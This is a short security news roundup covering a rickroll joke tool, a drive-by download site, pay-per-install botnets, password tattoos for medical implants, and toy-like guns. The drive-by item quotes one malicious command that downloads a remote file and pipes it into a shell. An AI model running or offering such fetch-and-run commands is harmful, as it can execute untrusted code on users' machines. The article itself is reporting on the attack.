Lost+Found: rickrolling, paper tiger, pay-per-install, tattoos, pretty weapons
Too short for news, too good to lose; Lost+Found is a round up of useful security information. Today: a rickroll protector, an attack of impotence, friendly bot herders, tattooing passwords and guns disguised as toys.
Have you been rickrolled yet again? Well, help is, erm was, at hand, with the new rickroll protector, an April 1st offering from F-Secure.
The H's associates at heise Security recently discovered a drive-by download website which also targeted Linux and Mac OS X systems in its attacks. Close examination showed that, under Linux, using Runtime.getRuntime().exec() (no exploit involved), the Java code attempted to run the following: wget http://.../Install.exe -O- | sh . They weren't particularly impressed.
Bot herders don't always have to compete when it comes to infecting PCs – they can also give each other a helping hand. Some bots install other bots on a pay-per-install basis. The pay-per-install model is also reported to have been used to install scareware on infected computers. In view of the size of many botnets – 100,000 bots is not uncommon – there is good money to be made at a rate of a few dollars per installation.
Microsoft has proposed requiring authentication before servicing medical implants, such as pacemakers and defibrillators, and tattooing the password onto the patient's skin using an ink which is only visible under UV.
Toys which look like real weapons are old hat, but real guns that look like toys? Criminals in the US are apparently now using disguised weapons that do just that.